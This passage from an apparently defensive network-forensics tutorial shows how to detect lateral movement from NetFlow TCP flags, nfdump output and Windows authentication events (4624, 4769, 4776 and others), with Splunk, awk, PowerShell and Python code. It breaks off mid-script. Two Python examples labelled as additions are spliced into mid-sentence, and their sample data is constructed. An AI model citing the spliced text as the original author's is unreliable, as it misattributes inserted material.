All_Traffic.src=\"10.10.*\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">          (All_Traffic.dest_port=445 OR All_Traffic.dest_port=135 OR All_Traffic.dest_port=3389</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">           OR All_Traffic.dest_port=5985 OR All_Traffic.dest_port=5986 OR All_Traffic.dest_port=22)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    BY All_Traffic.src, All_Traffic.dest_port</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| rename All_Traffic.* AS *</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where unique_dests &gt; 5</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| eval total_GB = round(total_bytes/1073741824, 3)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| sort -unique_dests</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| table src, dest_port, unique_dests, count, total_GB</span><br></span></code></pre></div></div>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"44-reading-tcp-flags-for-attack-technique-fingerprinting\">4.4 Reading TCP Flags for Attack Technique Fingerprinting<a href=\"https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs#44-reading-tcp-flags-for-attack-technique-fingerprinting\" class=\"hash-link\" aria-label=\"Direct link to 4.4 Reading TCP Flags for Attack Technique Fingerprinting\" title=\"Direct link to 4.4 Reading TCP Flags for Attack Technique Fingerprinting\" translate=\"no\">​</a></h3>\n<p>TCP flags in NetFlow records reveal the nature of a connection without needing packet content. 
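<p>To make the flag-set reading concrete, here is an added Python example (not code from the original post) that parses nfdump output, decodes the six-character <code>%flg</code> string into a set of flags, classifies each client-to-server flow record, and flags any source whose unanswered and half-open probes dwarf its completed handshakes. It assumes nfdump was run with <code>-N -q -o fmt:%ts %sa %da %dp %flg %pkt</code> (so <code>%ts</code> occupies two whitespace-separated fields) and that the exporter emits unidirectional records; the flow lines are constructed and the addresses in them are invented.</p>

```python
"""Decode nfdump %flg strings and separate scanners from real sessions.

Added example, not code from the original post. It assumes nfdump was run as
    nfdump -R <dir> -N -q -o "fmt:%ts %sa %da %dp %flg %pkt" "proto tcp and ..."
so every line is: date time src dst dport flags packets (%ts takes two fields),
and the flags column is nfdump's six-character string in the order U A P R S F.
The flag set of a flow record is the cumulative OR of every packet in the flow.
Sample flows below are constructed; the addresses are invented.
"""
from collections import Counter, defaultdict

FLAG_ORDER = "UAPRSF"  # column order of nfdump's %flg field


def parse_flags(flg):
    """'.AP.SF' -> frozenset({'A', 'P', 'S', 'F'})."""
    if len(flg) != len(FLAG_ORDER):
        raise ValueError(f"unexpected %flg value: {flg!r}")
    return frozenset(letter for letter, mark in zip(FLAG_ORDER, flg) if mark != ".")


def classify(flags):
    """Read the cumulative flag set of a client->server flow as a set, not a sequence."""
    if flags == {"S"}:
        return "unanswered"       # SYN sent, nothing came back (a RST-ACK lands in the reverse record)
    if {"S", "R"} <= flags and "A" not in flags:
        return "half_open_scan"   # SYN-ACK received, client reset: nmap -sS against an open port
    if {"S", "A"} <= flags:
        return "completed"        # handshake finished; P and F say data moved / closed cleanly
    if "A" in flags and "S" not in flags:
        return "continuation"     # long session split by the exporter's active timeout
    return "other"


def parse_line(line):
    """One line of the assumed format; %ts is 'date time', hence two fields."""
    date, time_, src, dst, dport, flg, pkts = line.split()
    return {"ts": f"{date} {time_}", "src": src, "dst": dst, "dport": int(dport),
            "flags": parse_flags(flg), "packets": int(pkts)}


def scan_report(lines, min_probes=10, ratio=10.0):
    """Per source: probes (unanswered + half-open) versus completed handshakes.

    A source is flagged when it sent at least `min_probes` probes and the
    probe/completed ratio exceeds `ratio` (no completions at all counts as infinite).
    """
    per_src = defaultdict(Counter)
    for line in lines:
        if line.strip():
            rec = parse_line(line)
            per_src[rec["src"]][classify(rec["flags"])] += 1

    report = {}
    for src, counts in per_src.items():
        probes = counts["unanswered"] + counts["half_open_scan"]
        completed = counts["completed"]
        r = probes / completed if completed else float("inf")
        report[src] = {"probes": probes, "completed": completed, "ratio": r,
                       "scanner": probes >= min_probes and r > ratio}
    return report


# Constructed sample: 10.10.4.23 sweeps twelve hosts on 445 (ten unanswered SYNs,
# two half-open hits on open ports); 10.10.4.50 has one real session with a file server.
SAMPLE_FLOWS = [
    f"2025-11-15 09:12:01.{100 + i:03d} 10.10.4.23 10.10.0.{5 + i} 445 ....S. 1" for i in range(10)
] + [
    "2025-11-15 09:12:01.131 10.10.4.23 10.10.0.15 445 ...RS. 2",
    "2025-11-15 09:12:01.134 10.10.4.23 10.10.0.16 445 ...RS. 2",
    "2025-11-15 09:40:12.003 10.10.4.50 10.10.0.10 445 .AP.SF 812",
    "2025-11-15 10:02:44.900 10.10.4.50 10.10.0.10 445 .AP..F 40",
]

if __name__ == "__main__":
    for src, r in sorted(scan_report(SAMPLE_FLOWS).items()):
        tag = "SCAN" if r["scanner"] else "ok  "
        print(f"{tag} {src:<12} probes={r['probes']:<3} completed={r['completed']:<3} ratio={r['ratio']:.1f}")
```

<p>Feed it real output with <code>scan_report(open(path))</code> after running the nfdump command in the docstring. The second flow from <code>10.10.4.50</code> carries ACK, PSH and FIN but no SYN, which the classifier reports as a continuation rather than a new session: that is what a long file copy looks like once the exporter's active timeout has split it, and it is why records should be joined on the 5-tuple before you count sessions.</p>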
This is particularly useful for distinguishing scanning from actual sessions. One caveat governs everything below: the flags field in a flow record is the cumulative OR of every packet the exporter saw in that flow, so read it as the set of flags that appeared at some point, not as a sequence. Most exporters also emit one unidirectional record per direction, so a single connection shows up twice with different flag sets; the table reads the client-to-server record, which is the one the nfdump filters in this section select.</p>\n<div class=\"language-text codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-text codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">TCP flags in NetFlow (cumulative OR of all packets in the flow; nfdump prints %flg as</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">six characters in the order U A P R S F, e.g. \"....S.\" or \".AP.SF\"):</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">─────────────────────────────────────────────────────────────────────────────────</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Flags set         Hex    nfdump   Meaning in a client-&gt;server record       Attacker Significance</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">─────────────────────────────────────────────────────────────────────────────────</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">SYN only          0x02   ....S.   Handshake never completed                Scanning: many such records from one source to many hosts; target down, filtered, or port closed (the RST-ACK sits in the reverse record)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">SYN+RST           0x06   ...RS.   SYN was answered, client reset it        Half-open (SYN) scan against an open port: scanner got SYN-ACK and tore down without ever sending ACK</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">SYN+ACK           0x12   .A..S.   Handshake completed, no data yet         Session open but idle when the record expired; in the server-&gt;client record this is simply the normal reply</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">RST+ACK           0x14   .A.R..   Reset without a SYN in this record       Existing session aborted; in the server-&gt;client record, RST-ACK alone means port closed</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">SYN+ACK+PSH+FIN   0x1B   .AP.SF   Full session with data and clean close   Real session: file copy, RDP, WinRM; read %byt and %pkt for volume</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">ACK+PSH (no SYN)  0x18   .AP...   Mid-connection record                    Long-lived session split by the exporter active timeout; join records on the 5-tuple before counting sessions</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">─────────────────────────────────────────────────────────────────────────────────</span><br></span></code></pre></div></div>\n<div class=\"language-bash codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-bash codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Find SYN-only flows (scanning: connections never completed)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Per source host, count client-&gt;server flows to 445 whose flag set is SYN only (\"....S.\",</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># nothing came back) against flows that carry SYN+ACK (handshake completed).</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># -N prints raw numbers, -q drops header/summary. %ts prints as \"date time\" (two awk</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># fields), so with this format %sa=$3 %da=$4 %dp=$5 %flg=$6 %pkt=$7.</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">nfdump </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-R</span><span class=\"token plain\"> /var/cache/nfdump/2025/11/15/ </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-N</span><span class=\"token plain\"> </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-q</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-o</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"fmt:%ts %sa %da %dp %flg %pkt\"</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"proto tcp and src net 10.10.0.0/16 and dst port 445\"</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">|</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">awk</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">        $6 == \"....S.\"     { syn_only[$3]++ }    # SYN flag only = never answered</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">        $6 ~ /^\\.A..S\\.$/  { completed[$3]++ }   # SYN and ACK both set = handshake completed</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">        END {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">            for (src in syn_only) {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">                ratio = (completed[src] &gt; 0) ? syn_only[src]/completed[src] : 999</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">                if (ratio &gt; 10) {  # 10x more unanswered SYNs than handshakes = scanning</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">                    printf \"SCAN from %s: %d SYN-only, %d completed, ratio=%.1f\\n\",</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">                           src, syn_only[src], completed[src], ratio</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">                }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">            }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">        }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">    '</span><br></span></code></pre></div></div>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"part-5--windows-authentication-log-correlation\">Part 5: Windows Authentication Log Correlation<a href=\"https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs#part-5--windows-authentication-log-correlation\" class=\"hash-link\" aria-label=\"Direct link to Part 5: Windows Authentication Log Correlation\" title=\"Direct link to Part 5: Windows Authentication Log Correlation\" translate=\"no\">​</a></h2>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" 
id=\"51-the-authentication-events-that-matter-for-network-forensics\">5.1 The Authentication Events That Matter for Network Forensics<a href=\"https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs#51-the-authentication-events-that-matter-for-network-forensics\" class=\"hash-link\" aria-label=\"Direct link to 5.1 The Authentication Events That Matter for Network Forensics\" title=\"Direct link to 5.1 The Authentication Events That Matter for Network Forensics\" translate=\"no\">​</a></h3>\n<p>Domain Controller Security logs record every domain authentication the DC itself arbitrates: Kerberos ticket requests (4768, 4769, 4771) and NTLM credential validations (4776). The logon events proper are written elsewhere: 4624, 4625 and 4672 on the machine being logged on to, 4648 on the machine the credentials were used from. You need both halves, which in practice means the DC logs plus whatever your SIEM or Windows Event Forwarding collects from servers and workstations. Together they are the <strong>identity layer</strong>: they tell you which account was used for which network connection, and from which source machine.</p>\n<p><strong>The key event IDs for network forensics correlation:</strong></p>\n<table><thead><tr><th>Event ID</th><th>Log Location</th><th>What It Records</th><th>Lateral Movement Significance</th></tr></thead><tbody><tr><td><strong>4624</strong></td><td>Security (target host)</td><td>Successful logon</td><td>Type 3 = network logon; maps a network connection to an identity (IpAddress, WorkstationName, AuthenticationPackageName)</td></tr><tr><td><strong>4625</strong></td><td>Security (target host)</td><td>Failed logon</td><td>Brute force, pass-the-hash failures, scanning</td></tr><tr><td><strong>4648</strong></td><td>Security (source host)</td><td>Explicit credentials used</td><td>Attacker using alternate credentials from a host; names the target server</td></tr><tr><td><strong>4672</strong></td><td>Security (target host)</td><td>Special privileges assigned</td><td>Admin-equivalent access on target</td></tr><tr><td><strong>4769</strong></td><td>Security (DC)</td><td>Kerberos TGS request</td><td>Which service ticket (ServiceName, normally the target's computer account in the form HOSTNAME$) was requested from which client IP (IpAddress)</td></tr><tr><td><strong>4776</strong></td><td>Security (DC)</td><td>NTLM credential validation</td><td>NTLM auth; includes source workstation name and account, but no source IP</td></tr><tr><td><strong>4768</strong></td><td>Security (DC)</td><td>Kerberos TGT request</td><td>Initial Kerberos auth; includes the client IP (IpAddress, usually written as ::ffff:a.b.c.d)</td></tr><tr><td><strong>4771</strong></td><td>Security (DC)</td><td>Kerberos pre-auth failure</td><td>Failed Kerberos: password spray, enumeration</td></tr></tbody></table>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"52-extracting-authentication-based-movement-chains\">5.2 Extracting Authentication-Based Movement Chains<a href=\"https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs#52-extracting-authentication-based-movement-chains\" class=\"hash-link\" aria-label=\"Direct link to 5.2 Extracting Authentication-Based Movement Chains\" title=\"Direct link to 5.2 Extracting Authentication-Based Movement Chains\" translate=\"no\">​</a></h3>\n<p>The most powerful query in Windows auth log forensics: find every machine that <code>jsmith@corp.local</code> authenticated to, in chronological order. 
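<p>Here is an added Python example (not code from the original post) that builds that chain from the DC side alone and goes one step beyond the PowerShell below by joining it to DHCP: each 4769 carries the client IP (<code>IpAddress</code>, written as <code>::ffff:a.b.c.d</code>) and the service account the ticket was for (<code>ServiceName</code>, <code>HOSTNAME$</code> for a machine), and the DHCP lease that covered that IP at that moment turns the IP into a source hostname. The 4769 records and the lease table are constructed, with invented hostnames, addresses and times; one IP changes hands mid-day on purpose, to show why the lookup has to be time-aware.</p>

```python
"""Reconstruct an account's lateral movement chain from 4769 events plus DHCP leases.

Added example, not code from the original post. Records are constructed to mirror the
EventData fields of a 4769 (TargetUserName, ServiceName, IpAddress) plus TimeCreated;
DHCP leases are (ip, host, start, end). All names, addresses and times are invented.
"""
from datetime import datetime

TS_FMT = "%Y-%m-%d %H:%M:%S"


def parse_ts(ts):
    return datetime.strptime(ts, TS_FMT)


def normalize_ip(ip):
    """Kerberos events log IPv4 clients as IPv4-mapped IPv6 (::ffff:a.b.c.d)."""
    return ip[7:] if ip.lower().startswith("::ffff:") else ip


def host_for(ip, when, leases):
    """Hostname holding the lease on `ip` at `when`; None if no lease covers that moment."""
    for lease in leases:
        if lease["ip"] == ip and parse_ts(lease["start"]) <= when <= parse_ts(lease["end"]):
            return lease["host"]
    return None


def movement_chain(events, leases, account):
    """Ordered (time, source_host, target_host) hops for `account`.

    Skips krbtgt (TGT requests and renewals are not hops), skips tickets for the host
    the user is already sitting at, and collapses consecutive duplicates, since Kerberos
    issues several service tickets per session. Service accounts that are not computer
    accounts come through under their account name; map those to hosts via their SPNs.
    """
    hops = []
    for ev in sorted(events, key=lambda e: parse_ts(e["time"])):
        user = ev["TargetUserName"].split("@", 1)[0]
        if user.lower() != account.lower():
            continue
        svc = ev["ServiceName"]
        if svc.lower() == "krbtgt":
            continue
        target = svc.rstrip("$").upper()           # HOSTNAME$ -> HOSTNAME
        when = parse_ts(ev["time"])
        ip = normalize_ip(ev["IpAddress"])
        source = host_for(ip, when, leases) or f"unknown({ip})"
        if source.upper() == target:
            continue                                # ticket for the user's own workstation
        if hops and hops[-1][1:] == (source, target):
            continue                                # same hop repeated within one session
        hops.append((ev["time"], source, target))
    return hops


# Constructed DHCP lease history. 10.10.4.23 changes hands at 09:31: a time-unaware
# IP-to-host lookup would blame WS-HR-112 for everything the later holder did.
LEASES = [
    {"ip": "10.10.4.23", "host": "WS-HR-112",  "start": "2025-11-15 06:00:00", "end": "2025-11-15 09:30:00"},
    {"ip": "10.10.4.23", "host": "WS-ENG-044", "start": "2025-11-15 09:31:00", "end": "2025-11-16 06:00:00"},
    {"ip": "10.10.5.77", "host": "WS-FIN-019", "start": "2025-11-15 07:10:00", "end": "2025-11-16 07:10:00"},
]

# Constructed 4769 records as they would come out of the DC Security log.
EVENTS = [
    {"time": "2025-11-15 08:05:10", "TargetUserName": "jsmith@CORP.LOCAL", "ServiceName": "krbtgt",     "IpAddress": "::ffff:10.10.4.23"},
    {"time": "2025-11-15 08:05:12", "TargetUserName": "jsmith@CORP.LOCAL", "ServiceName": "WS-HR-112$", "IpAddress": "::ffff:10.10.4.23"},
    {"time": "2025-11-15 08:05:12", "TargetUserName": "jsmith@CORP.LOCAL", "ServiceName": "WS-HR-112$", "IpAddress": "::ffff:10.10.4.23"},
    {"time": "2025-11-15 09:45:30", "TargetUserName": "jsmith@CORP.LOCAL", "ServiceName": "FS01$",      "IpAddress": "::ffff:10.10.4.23"},
    {"time": "2025-11-15 09:47:02", "TargetUserName": "jsmith@CORP.LOCAL", "ServiceName": "SQL02$",     "IpAddress": "::ffff:10.10.4.23"},
    {"time": "2025-11-15 10:15:00", "TargetUserName": "jsmith@CORP.LOCAL", "ServiceName": "FS01$",      "IpAddress": "::ffff:10.10.5.77"},
    {"time": "2025-11-15 10:20:00", "TargetUserName": "bjones@CORP.LOCAL", "ServiceName": "FS01$",      "IpAddress": "::ffff:10.10.5.77"},
]

if __name__ == "__main__":
    for ts, src, dst in movement_chain(EVENTS, LEASES, "jsmith"):
        print(f"{ts}  {src:<12} -> {dst}")
```

<p>On the constructed data the 09:45 and 09:47 tickets resolve to WS-ENG-044, not to WS-HR-112 that held the same address two hours earlier; a lookup that ignores lease times would send the host-forensics team to the wrong desk. The same join works for 4624 Type 3 records collected from targets, using their <code>IpAddress</code> field, and the output lines up by timestamp with the NetFlow records for ports 445, 3389 and 5985 from the previous section.</p>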
This is the lateral movement chain.</p>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Build authentication chain for a specific account across all DCs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Run against your SIEM or directly against DC Security logs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$targetAccount = \"jsmith\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$startTime = [DateTime]::Parse(\"2025-11-15 00:00:00\")</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$endTime   = [DateTime]::Parse(\"2025-11-16 00:00:00\")</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Query all DCs for logon events involving the account</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$domainControllers = (Get-ADDomainController -Filter *).Name</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$authEvents = @()</span><br></span><span 
class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">foreach ($dc in $domainControllers) {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Write-Host \"Querying $dc...\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    # 4769 (Kerberos TGS) and 4776 (NTLM validation) are written on the DCs; 4624 (logon)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    # and 4648 (explicit creds) appear here only for logons to the DC itself, so for</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    # member servers and workstations point this at those hosts or at your SIEM</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $filter = @{</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        LogName   = 'Security'</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        Id        = @(4624, 4648, 4769, 4776)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        StartTime = $startTime</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        EndTime   = $endTime</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    try {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        $events = Get-WinEvent -ComputerName $dc -FilterHashtable $filter `</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                               -ErrorAction Stop</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        foreach ($event in $events) {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            $xml = [xml]$event.ToXml()</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            # Index EventData by name once; field names differ per event ID (4776 uses</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            # 'Workstation' and has no IpAddress; 4769 writes IPv4 clients as ::ffff:a.b.c.d)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            $f = @{}</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            foreach ($d in $xml.Event.EventData.Data) { if ($d.Name) { $f[$d.Name] = $d.'#text' } }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            $ws = if ($f['WorkstationName']) { $f['WorkstationName'] } else { $f['Workstation'] }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            $entry = [PSCustomObject]@{</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                Timestamp     = $event.TimeCreated</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                EventID       = $event.Id</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                DC            = $dc</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                AccountName   = $f['TargetUserName']</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                AccountDomain = $f['TargetDomainName']</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                SourceIP      = ($f['IpAddress'] -replace '^::ffff:', '')</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                Workstation   = $ws</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                LogonType     = $f['LogonType']</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                AuthPackage   = $f['AuthenticationPackageName']</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                ServiceName   = $f['ServiceName']</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                LogonID       = $f['TargetLogonId']</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            # Match jsmith and jsmith@CORP.LOCAL (4769 uses the UPN form), but not ajsmith or jsmith2</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            if ($entry.AccountName -match \"^$([regex]::Escape($targetAccount))(@|$)\") {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                $authEvents += $entry</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            